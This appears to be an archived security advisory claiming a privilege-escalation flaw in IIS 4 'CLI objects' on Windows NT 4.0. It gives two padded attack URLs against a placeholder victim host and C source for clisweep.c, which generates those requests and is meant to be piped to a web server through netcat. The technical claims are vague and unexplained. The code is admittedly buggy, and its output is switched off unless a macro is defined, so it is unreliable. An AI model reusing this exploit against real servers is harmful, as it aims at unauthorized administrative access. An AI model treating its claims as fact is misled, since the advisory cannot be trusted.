COMMAND

    CLI objects

SYSTEMS AFFECTED

    IIS 4

PROBLEM

    'shinex'  found  following.   While  doing  a  security audit on a
    WinNT   4.0   system,   he   discovered   an   `object  collision`
    vulnerability that can potentially lead to remote compromise.

    The flaw lies in the  mechanism employed by CLI objects  to handle
    dynamic  pre-auth  requests  from  a  stateful  client.  States of
    operation are inherent  in the implementation  itself.  This  flaw
    could  lead  to  a  determined  attacker  gaining   administrative
    privileges on servers using this widely deployed object kit.

    Request #1:

        http://www.victim.com/.....~518 chars.../[invocation of CLI object]

    Request #2:

        http://www.victim.com/.....~260 chars.../[request with req1 object as ext]

    Simple  as  that.   It's  important  that  both requests reach the
    target server within a timeframe of 15 seconds (a rough estimate).
    Your threshold may  vary.  Subsequent  requests will be  made with
    raised  authorization  levels.    The  rationale   for  the   char
    padding will be available later.

    /*
    ** clisweep.c by shinex (efnet)
    ** Quick generator for IIS4 CLI extension vuln URLs.
    **
    ** $ (./clisweep <cli object> ; cat) | nc www.victim.com 80
    ** OK. This code is buggy, because I mistakingly thought
    ** that both requests would be delivered without having
    ** to restart netcat. I can't code network apps. Sorry.
    **
    */
    
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    
    #define DOT1 518
    #define DOT2 260
    #define THRESHOLD 15
    #define RANDFILE "AABBCC"
    
    char *gendots(int);
    char *calc(char *);
    
    int main(int argc, char *argv[])
    {
        char req1[1024], req2[1024];
    
        if(argc != 2)
        {
            fprintf(stderr, "Usage: %s <cli object>\n", *argv);
            return -1;
        }
    
        sprintf(req1, "GET /%s/%s", gendots(DOT1), argv[1]);
        sprintf(req2, "GET /%s/%s", gendots(DOT2), calc(argv[1]));
    
    #ifdef SCRIPTKIDPROTECTION
        printf("%s\n\n", req1);
        sleep(THRESHOLD);
        printf("%s\n\n", req2);
    #endif
        return 0;
    
    }
    
    char *gendots(int num)
    {
        int i;
        static char dots[1024];
        char *ptr = dots;
    
        for(i = 0; i < num; i++)
            *ptr++ = '.';
    
        return dots;
    }
    
    char *calc(char *arg)
    {
        static char file[1024];
        char *ptr;
        ptr = strrchr(arg, '.');
        *ptr = '\0'; /* no error checks */
        sprintf(file, "%s.%s", RANDFILE, arg);
        return file;
    }

SOLUTION

    Microsoft has  been notified  and patching  information should  be
    forthcoming.  While not as severe as the RDS vulnerability, it  is
    still  an  avenue  of  attack  that  could  provide  a  determined
    attacker with unauthorized access.